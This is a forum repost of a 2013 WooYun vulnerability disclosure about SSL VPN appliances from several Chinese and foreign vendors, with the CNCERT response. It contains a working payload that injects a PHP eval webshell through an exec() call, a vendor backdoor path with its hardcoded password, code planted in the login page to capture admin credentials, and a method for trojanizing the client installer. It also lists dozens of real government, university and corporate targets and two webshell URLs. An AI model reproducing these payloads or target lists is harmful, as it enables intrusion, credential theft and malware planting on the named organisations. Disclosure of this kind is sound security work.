标题:
网御神州 网神 天融信 西安网赢 卫士通 吉大正元 凹凸 ANIX vpn设备厂商批量漏洞
[打印本页]
作者:
linda
时间:
2015-1-7 18:17
标题:
网御神州 网神 天融信 西安网赢 卫士通 吉大正元 凹凸 ANIX vpn设备厂商批量漏洞
漏洞概要
缺陷编号:
WooYun-2013-24919
漏洞标题: [浅谈内网安全]--国内外多家vpn设备厂商批量漏洞
相关厂商:
网御神州、天融信、西安网赢、卫士通、吉大正元、美国凹凸、德国 ANIX等多家VPN厂商设备
漏洞作者:
紫梦芊
提交时间: 2013-06-01 11:23
公开时间: 2013-08-30 11:24
漏洞类型: 设计不当
危害等级: 中
自评Rank: 5
漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)
处理漏洞来源:
http://www.wooyun.org
Tags标签:
远程命令执行
设计缺陷/边界绕过
任意文件下载
木马下发
数据库明文密码
漏洞详情披露状态:
2013-06-01: 细节已通知厂商并且等待厂商处理中
2013-06-03: 厂商已经确认,细节仅向厂商公开
2013-06-06: 细节向第三方安全合作伙伴开放
2013-06-13: 细节向核心白帽子及相关领域专家公开
2013-06-23: 细节向普通白帽子公开
2013-07-13: 细节向实习白帽子公开
2013-08-30: 细节向公众公开
简要描述:
继之前乌云上爆出深信服大量高危漏洞后,大家就感到vpn等基础设施的安全性非常值得重视,一暴露就涉及到内网系统的安全性,毕竟这些系统的安全性大都依赖于vpn验证有效用户,现在来发些其他厂商的高危吧(据知有人手中还有新版M5.9的0day).
该漏洞涉及到包括网御神州、天融信、西安网赢、卫士通、吉大正元、美国凹凸、德国 ANIX等多家VPN厂商设备在政务、地产、运营商、政府部门、高校、企业、公安、司法、银行等行业存在的任意文件下载、远程命令执行、维护后门、三方平台帐号泄漏、恶意客户端下发等高位漏洞。
发现有些时日了,很可惜的错过了乌云众测四期(知道四期是关于vpn的时四期已经结束了,不知道这些漏洞是不是那个厂商也有的)
为了防止像深信服那种问题,建议由cncert分发给各厂商,然后3个月后公开。
详细说明:
看到在北大读研的同学Ray发的信息东点西点进到了vpn.pku.edu.cn(当时还是o2的vpn,现在可以借鉴北大计算中心
https://124.205.79.78/
)然后尝试渗透测试,发现有个证书请求链接,点进去看可以下载东西,但是没有初始化mimiCA,于是想到同源通注,就去网上找相同代码特征的系统 很容易地找到了vpn.cnu.edu.cn/sub_ca.php
在sub_ca_action.php?id=0看到 任意文件下载
分别传入参数/etc/httpd/httpd.conf 和 httpd.conf获得apache配置 找到了web根路径为/ssl/www 于是想看看漏洞代码是如何的
然后分别传入传 /ssl/www/minica_down.php 和minica_down.php下载minica_down.php
前两行是发现
code 区域if($_POST['realfile'])
exec("cp ".$_POST['realfile']." ".$_POST['path']."");
(感觉这些vpn设备的开发管用C和shell的思想,所以喜欢用system和exec不喜欢php内置函数)
幸好之前在淘宝实习时学过白盒 能看懂些代码 于是 有了任意命令执行
code 区域<form action="https://IP/minica_down.php" method="post">
<input name="realfile" type="hidden" value="aimee.php aimee.php || echo '<?php eval($_POST[cmd]);?>It works' >/ssl/www/aimee.php ">
<input type=hidden>
<input type=submit>
</form>
提交一个后门
用菜刀连接,获得root权限, 这还没结束。
对代码进行些审计,发现开发留的后门/ssl/www/admin/debug.php 帐号密码o2micro killbug(部分厂家已经去掉)
然后发现mysql不向外开放并且是unix的socket方式去访问的
但是可以通过
ini_set("mysql.default_socket = /var/run/mysql/mysql.sock"); 去连接
可以exec("/ssl/mysqld/mysqldump >xxx") 导出或是用exec执行sql等
然后管理员密码是sha1加密了的 于是在/ssl/www/admin/login_action.php第128行(认证成功后)加入 (初学php,别见笑)
code 区域$obj=file_get_contents("admin.json");
$userList=json_decode($obj);
$userList->$UserName=$UserPass;
file_put_contents("admin.json",json_encode($userList));
钓取管理员账号密码
钓鱼后进入后台了解了下系统,发现三方LDAP、AD认证方式管理帐号密码可以在html代码中看到明文,
其次就是存储三方系统登录地址、帐号、密码用来实现SSO的子帐号也是明文,数据库中一看,证实未进行任何加密处理,至少也应该来个AES吧(一些系统没配认证方式和子帐号)
使用一次vpn后发现是web端安装插件方式安装客户端,于是尝试给客户端加点东西试试,对于dll绑恶意dll我不会(而且给dll签名没证书),只能在exe上拙劣的下手,于是到/ssl/www/download/ClientSetup.exe(app.exe.cab应该也存在问题)
下载下来,用winrar生成自解压运行的包含恶意文件和ClientSetup.exe的新ClientSetup.exe 传入到原目录替换后能够达到在内网种植木马的功效。
-------------------------------------------------------
存在漏洞的站点至少包括
美国凹凸科技(o2security)
https://vpn.bit.edu.cn/
北京理工
https://sslvpn.bjtu.edu.cn/
北交大
https://125.46.88.100/
郑州大学
https://219.80.0.19/p
国泰地产集团
https://info.nai.edu.cn/
北京国家会计学院
https://124.205.79.78/
北大计算中心
https://210.82.53.201/
北京联合大学
https://vpn.cnu.edu.cn/
首都师大
https://vpn.mcut.edu.tw/
台湾明志科技大学
https://ac.whlib.gov.cn
武汉图书馆
https://sslvpn.nhcue.edu.tw
新竹教育大学
https://isms.ydu.edu.tw/
育達商業科技大學
https://sslvpn.ydu.edu.tw/
育達商業科技大學
https://vpn.cute.edu.tw
中国(台湾)科技大学
https://sslvpn.ntue.edu.tw
国立台北教育大学
https://vpn.psi.com.tw
升阳国际
https://maltimur.jksm.gov.my/
马来西亚某政府网站
https://vpn.ccom.edu.cn
中央音乐学院
https://vpn.dlmu.edu.cn
大连海事大学
https://vpn.wanfang.edu.cn
河南理工
https://vpn.genius.com.cn
深圳巨灵
https://sslvpn.changhongit.com
长虹佳华
https://vpn.jnrd.com.cn
北京京能热电
https://sslvpn.kworld.com.tw
廣寰台北辦公室
https://www.oo586.com/
易宝支付
https://svpn.mbatec.com.tw
新碩資訊
https://sslvpn.szs.com.tw
新日兴
https://sslvpn.gzcatv.net
广数传媒
https://e.nais.net.cn
农业部农E通
https://vpn.thcic.cn
清华
https://vpn.pku.edu.cn/
北大(已经失效)
https://vpn.cau.edu.cn/
中国农大(已经换了)
https://sh-vpn.o2micro.com
o2
https://bj-vpn.o2micro.com
o2
https://cd-vpn.o2micro.com
o2
天融信 网络卫士VPN系统(admin/debug.php o2micro killbug)
https://218.26.21.194/
山西邮政VPN系统
https://218.26.7.112/
山西检验检疫局VPN系统
联想网神-网御神州 SecSSL3600(号称国内第一的SSLVPN)
https://220.178.250.102/
马鞍山市行政事业单位资产管理信息系统
https://vpn.hnuu.edu.cn/
淮南联大
https://222.75.160.120/
https://60.191.18.54/
https://61.191.18.137/
合肥市房地产市场信息系统
https://218.22.51.114/
安徽省肥西财政局
https://183.166.187.156/
黄山市网上房地产信息系统
https://oa.qzbsg.gov.cn
广西钦州保税港区
https://www.smfgny.com
陕西煤业化工集团
https://cbj.1203.org
残疾人就业保障金征缴管理系统
https://58.54.252.40
荆州电子政务外网
https://218.24.94.244
沈阳市经济和信息化委员会
https://219.141.234.54/
中国渔政管理指挥系统
https://vpn.cdc.com.cn
成都普天电缆
https://58.242.162.242/
https://116.236.137.18/
https://oa.qzbsg.gov.cn/
https://122.225.14.154/
https://60.191.18.54/
西安网赢信息技术有限公司 护航者
https://125.65.179.230/
四川省丹棱县党政综合办公平台
https://www.scxjrz.com/
四川电信安全运营中心
德国ANIX
https://vpn.tgsh.ttct.edu.tw/
台东女中
卫士通 中华卫士
https://ssl.qztc.com/welcome.php
泉州电信
吉大正元
https://oa.chnmuseum.cn/
国家博物馆
https://218.62.26.250/
https://219.143.243.103/
这些里面没有minica_down的就有debug后门,没debug的就有minica_down问题 很多是都存在。
在这些厂商描述中他们在公安网 银行专网 审计署内部网络 司法专网等私网也用了这些系统保护信息安全 据我猜想如果这些私网中肯定更有很多不堪一击的系统。
所以个人认为内网安全不能仅仅去依靠防火墙 VPN IDS等设备去完成 一旦这些设备出现问题 或是被合法绕过 里面的系统如果安全性不够的话 信息泄漏是很轻易的事。
漏洞证明:
两个一句话例子
https://vpn.thcic.cn/sms_inc.php
https://218.26.21.194/sms_inc.php
修复方案:
1.删除debug.php
2.minica_down.php第2和12行
exec("cp ".$_POST['realfile']." ".$_POST['path']."");改为
copy($_POST['realfile'],$_POST['path'])
exec("rm ".$_POST["path"]."");改为
unlink($_POST['path'])
3.子帐号和三方认证平台管理信息使用AES或3des加密存在数据库中 防止脱裤后的更大安全危害
4.在客户端安全加入checksum
版权声明:转载请注明来源
紫梦芊
@
乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-06-03 22:29
厂商回复:
CNVD确认并复现所述其中三个厂商案例情况,另外四家厂商可确认产品同源,但实测未发现包含或远程执行相关结果。根据后续源代码分析,OEM为主要原因,问题根源出现在第一家厂商上。
针对测试得到的部分结果,CNVD以及CNCERT采用以下方式进行:1、CNVD向国内相关VPN设备厂商询查是否OEM目标厂商产品,并协调涉事的三家厂商先行处置;2、对于涉及的政府和重要部门,转由CNCERT协调设备管理单位处置(包含一些工业和信息化部直属高校);
最早在明天应该会有一个通信行业通报出来,向社会公众发布预警。
rank 30?40?
最新状态:
暂无
原文:
http://www.wooyun.org/bugs/wooyun-2013-024919
[
本帖最后由 linda 于 2016-2-15 11:01 编辑
]
欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)
Powered by Discuz! 6.0.0